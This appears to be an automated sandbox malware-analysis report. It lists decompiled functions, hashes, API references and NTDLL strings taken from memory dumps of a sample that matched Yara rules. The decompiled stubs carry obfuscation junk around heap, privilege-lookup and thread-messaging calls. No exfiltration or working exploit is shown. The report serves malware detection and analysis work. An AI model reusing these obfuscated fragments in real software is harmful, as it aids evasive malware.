Opcode ID: 7555b1ffc71de4ffddbb37ec512d4a32f6153a5034b14869ab15e14ff964f889
Instruction ID: 99d8afedd5744a8dfc1395879c40f88e76662788a75bbdb3fd105cf9428736cf
Opcode Fuzzy Hash: 7555b1ffc71de4ffddbb37ec512d4a32f6153a5034b14869ab15e14ff964f889
Instruction Fuzzy Hash: D990027121104802D60065ED55086460005A7E0341F51D011A5014555EC6A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 012897A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012897AA

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a15f42ebb1e5623ba5927eab4860a4419c6d3d42a9687a9d469598def4d20a4f
Instruction ID: e691067171bc0d227c19bc5b42614706ac5f49253a91f631c819b7e2408f5d44
Opcode Fuzzy Hash: a15f42ebb1e5623ba5927eab4860a4419c6d3d42a9687a9d469598def4d20a4f
Instruction Fuzzy Hash: BE90026131104403D64071AD55186064005F7E1341F51D011E0404554CD9558C567372

Uniqueness

Uniqueness Score: -1.00%

Function 01289780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128978A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37c60830dbdaa6b971f81233fea27411d96a444ca4495e24e571bef9062911f6
Instruction ID: 09c326399ff9cdf037e8cf80dfcbd3b101c01b3c02d5b1c6be7940af99dc4395
Opcode Fuzzy Hash: 37c60830dbdaa6b971f81233fea27411d96a444ca4495e24e571bef9062911f6
Instruction Fuzzy Hash: C990026922304402D68071AD550860A0005A7D1242F91D415A0005558CC9558C697371

Uniqueness

Uniqueness Score: -1.00%

Function 01289FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289FEA

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e91ae3e92e58a4ca55a0eb5c639099fce3468ae2a02c7ca63bee3798e8481d37
Instruction ID: 31ea8e7553e0eae5d9f0934a57ca9ad99b17186d54acdf2eeb735dc4580e08af
Opcode Fuzzy Hash: e91ae3e92e58a4ca55a0eb5c639099fce3468ae2a02c7ca63bee3798e8481d37
Instruction Fuzzy Hash: 3890027132118802D61061AD85047060005A7D1241F51C411A0814558DC6D58C917272

Uniqueness

Uniqueness Score: -1.00%

Function 01289660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128966A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c54e6ae5dbd60500586b6397c8b41247c9af06935a7dddc7af7264e3d10eb529
Instruction ID: 7115e7203d327d909a0caa1c2696f8c475988533c43e42100b7c40e618f26e4a
Opcode Fuzzy Hash: c54e6ae5dbd60500586b6397c8b41247c9af06935a7dddc7af7264e3d10eb529
Instruction Fuzzy Hash: 4090027121104C02D68071AD450464A0005A7D1341F91C015A0015654DCA558E5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 012896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012896EA

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e99d5a76a5e08125f264cdcf7793ef420dd50dd6ea7437e1da73c89a438f012
Instruction ID: 299958927149c7ca006bad74cb1ae4ca6fbc0841315f658ec8fc1d18038ef8ca
Opcode Fuzzy Hash: 2e99d5a76a5e08125f264cdcf7793ef420dd50dd6ea7437e1da73c89a438f012
Instruction Fuzzy Hash: 949002712110CC02D61061AD850474A0005A7D0341F55C411A4414658DC6D58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004184B2, Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: 1873d3103fdb24346659e9ae4235241b7203206109a5f2a9c3b90445ff651ec5
Instruction ID: 7ccf9dcb4ef08d56a2214b80f290fee0afeb21c4f386859bb3c742e37e86559f
Opcode Fuzzy Hash: 1873d3103fdb24346659e9ae4235241b7203206109a5f2a9c3b90445ff651ec5
Instruction Fuzzy Hash: B6F022B1604211AFCB20EFA8DC40EE77B68EF85360B104A4DFD0D9B251DA31A825CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B10(_t24, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = E00413E20();
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x0040726f
0x00407273
0x0040727e
0x0040728a
0x0040728e
0x00407293
0x00407298
0x0040729a
0x0040729c
0x0040729d
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00407233, Relevance: 1.5, APIs: 1, Instructions: 32
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00407233() {
				int _t4;
				long _t9;
				int _t12;
				void* _t14;

				_t4 = E00413E20();
				_t12 = _t4;
				if(_t12 != 0) {
					_t9 =  *(_t14 + 0xc);
					_t4 = PostThreadMessageW(_t9, 0x111, 0, 0); // executed
					_t21 = _t4;
					if(_t4 == 0) {
						_t4 =  *_t12(_t9, 0x8003, _t14 + (E00409270(_t21, 1, 8) & 0x000000ff) - 0x40, _t4);
					}
				}
				return _t4;
			}

0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d59fe02fea21ff3c59d13fcaaf88da1c173fbf1ae21260dddba8ce680c509b79
Instruction ID: 4da34e2dad00bf219aa72800a72ebea919b3a79ce4dfb725bbcf4dcdb2f5ea5a
Opcode Fuzzy Hash: d59fe02fea21ff3c59d13fcaaf88da1c173fbf1ae21260dddba8ce680c509b79
Instruction Fuzzy Hash: 60E09231B8022431E62055556C03FBE73584B40B11F2440AFFF04F92C1E5A86D0602E6

Uniqueness

Uniqueness Score: -1.00%

Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00418611(signed int __eax, signed int __ebx, void* __edi, void* __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t15;

				_push(es);
				asm("int1");
				 *0xb7810aa1 =  *0xb7810aa1 ^ __eax;
				 *(__esi - 0x74aa94c6) =  *(__esi - 0x74aa94c6) ^ __ebx;
				_t12 = _a4;
				_push(__esi);
				E00418DB0(__eax, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t12 + 0xa18)), 0, 0x46);
				_t15 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t15;
			}

0x00418613
0x00418615
0x00418616
0x0041861c
0x00418623
0x0041862c
0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a3e2cca35630c514b91ed6cd12a6ab4dd0bdd9d22c7430cb670af5a83297cd3a
Instruction ID: 7f1159e60ed753769e4c2c9b9d2338a45cc7caeb46814b4a563e8694ebab3977
Opcode Fuzzy Hash: a3e2cca35630c514b91ed6cd12a6ab4dd0bdd9d22c7430cb670af5a83297cd3a
Instruction Fuzzy Hash: 8FF039B1640204AFDB14DF65CC86EE77BA9EF89350F008569F94997681CA74A8118BF4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418497
0x0041849f
0x004184a2
0x004184a6
0x004184ab
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				_t3 = _t5 + 0xc7c; // 0xc7c
				E00418DB0(_t10, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418503
0x00418512
0x0041851a
0x00418528

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 004184FE, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004184FE(intOrPtr _a4, int _a8) {
				void* _t10;

				asm("repne call dword 0x845:0x8bec8b55");
				_t5 = _a4;
				_t3 = _t5 + 0xc7c; // 0xc7c
				E00418DB0(_t10, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x004184fe
0x00418503
0x00418512
0x0041851a
0x00418528

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 014125badc0a05c255e24340b6cdc057c458607dcab8686c342f57f3e1ee89b4
Instruction ID: b54ec0201b646abf5f367897c8408ad0ccb576e689821a1f4bc8bfbe3d1b905b
Opcode Fuzzy Hash: 014125badc0a05c255e24340b6cdc057c458607dcab8686c342f57f3e1ee89b4
Instruction Fuzzy Hash: D1D0A771600200BBD720DFA48D85FD73768DF85340F05845A7B2C2B382CD35AA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00418446, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 39a4cce7c5354461c368d07cd146505b1d49da6115bb22df1dc6fc56588c3934
Instruction ID: 4dc235a84464b11c2224569936aec6ce6c6ed0a2d1e1cea7b7419cc5b618f992
Opcode Fuzzy Hash: 39a4cce7c5354461c368d07cd146505b1d49da6115bb22df1dc6fc56588c3934
Instruction Fuzzy Hash: D1C08CB6214013498360EA84DC808B2B31AEBC4330320860A959B4B101AA39854B46A1

Uniqueness

Uniqueness Score: -1.00%

Function 0128967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289694

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f34d2af30a5421c8267b3b85307e4637b6323f22658e8176bd1b3f6bcb3bf26a
Instruction ID: 4afdc38d2332c62cabf69f2b0908090e8fa429e6cf4ded6282929a16b5bc892c
Opcode Fuzzy Hash: f34d2af30a5421c8267b3b85307e4637b6323f22658e8176bd1b3f6bcb3bf26a
Instruction Fuzzy Hash: A4B09B719124D5C9DF11E7B44708737790077D0745F16C051D2020645B4778C4D1F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012FB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

an invalid address, %p, xrefs: 012FB4CF
The critical section is owned by thread %p., xrefs: 012FB3B9
a NULL pointer, xrefs: 012FB4E0
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012FB47D
read from, xrefs: 012FB4AD, 012FB4B2
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012FB2DC
This failed because of error %Ix., xrefs: 012FB446
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012FB53F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012FB476
Go determine why that thread has not released the critical section., xrefs: 012FB3C5
The instruction at %p tried to %s , xrefs: 012FB4B6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012FB323
<unknown>, xrefs: 012FB27E, 012FB2D1, 012FB350, 012FB399, 012FB417, 012FB48E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 012FB2F3
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012FB3D6
The resource is owned exclusively by thread %p, xrefs: 012FB374
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012FB314
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012FB484
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012FB305
*** An Access Violation occurred in %ws:%s, xrefs: 012FB48F
*** then kb to get the faulting stack, xrefs: 012FB51C
*** Resource timeout (%p) in %ws:%s, xrefs: 012FB352
write to, xrefs: 012FB4A6
*** enter .exr %p for the exception record, xrefs: 012FB4F1
*** enter .cxr %p for the context, xrefs: 012FB50D
*** Inpage error in %ws:%s, xrefs: 012FB418
The resource is owned shared by %d threads, xrefs: 012FB37E
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012FB38F
The instruction at %p referenced memory at %p., xrefs: 012FB432
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 012FB39B

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 9285421a7c8422c36a8ccec3ac0c77df49ba618f30489f3650fef9b3c75bb8f4
Instruction ID: ab15d8b0303ea669656c8992d11b2eda88ebf547c2a709c3d50d47f2755cf0f2
Opcode Fuzzy Hash: 9285421a7c8422c36a8ccec3ac0c77df49ba618f30489f3650fef9b3c75bb8f4
Instruction Fuzzy Hash: 6C8126B5A70205FFEB255B4ACC9AE7B7F36EF96A52F41405CF7041B112D2A18411C772

Uniqueness

Uniqueness Score: -1.00%

Function 01301C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01301C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x133589c);
				E0124B150("Heap error detected at %p (heap handle %p)\n",  *0x13358a0);
				_t27 =  *0x1335898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01301E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0124B150("Error code: %d - %s\n",  *0x1335898);
				_t113 =  *0x13358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter1: %p\n",  *0x13358a4);
				}
				_t115 =  *0x13358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter2: %p\n",  *0x13358a8);
				}
				_t117 =  *0x13358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter3: %p\n",  *0x13358ac);
				}
				_t119 =  *0x13358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13358b4);
					E0124B150("Last known valid blocks: before - %p, after - %p\n",  *0x13358b0);
				} else {
					_t120 =  *0x13358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0124B150("Stack trace available at %p\n", 0x13358c0);
			}

0x01301c10
0x01301c16
0x01301c1e
0x01301c3d
0x01301c3e
0x01301c20
0x01301c35
0x01301c3a
0x01301c44
0x01301c55
0x01301c5a
0x01301c65
0x01301c67
0x00000000
0x01301c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01301c67
0x01301cdc
0x01301ce5
0x01301d04
0x01301d05
0x01301ce7
0x01301cfc
0x01301d01
0x01301d0b
0x01301d17
0x01301d1f
0x01301d25
0x01301d30
0x01301d4f
0x01301d50
0x01301d32
0x01301d47
0x01301d4c
0x01301d61
0x01301d67
0x01301d68
0x01301d6e
0x01301d79
0x01301d98
0x01301d99
0x01301d7b
0x01301d90
0x01301d95
0x01301daa
0x01301db0
0x01301db1
0x01301db7
0x01301dc2
0x01301de1
0x01301de2
0x01301dc4
0x01301dd9
0x01301dde
0x01301df3
0x01301df9
0x01301dfa
0x01301e00
0x01301e0a
0x01301e13
0x01301e32
0x01301e33
0x01301e15
0x01301e2a
0x01301e2f
0x01301e39
0x01301e4a
0x01301e02
0x01301e02
0x01301e08
0x00000000
0x00000000
0x01301e08
0x01301e5b
0x01301e7a
0x01301e7b
0x01301e5d
0x01301e72
0x01301e77
0x01301e95

Strings

Parameter1: %p, xrefs: 01301D5C
Parameter2: %p, xrefs: 01301DA5
heap_failure_unknown, xrefs: 01301C75
HEAP: , xrefs: 01301C16, 01301C3D, 01301D04, 01301D4F, 01301D98, 01301DE1, 01301E32, 01301E7A
heap_failure_invalid_allocation_type, xrefs: 01301CB4
heap_failure_invalid_argument, xrefs: 01301CAD
heap_failure_virtual_block_corruption, xrefs: 01301C91
heap_failure_buffer_underrun, xrefs: 01301C9F
Heap error detected at %p (heap handle %p), xrefs: 01301C50
Stack trace available at %p, xrefs: 01301E86
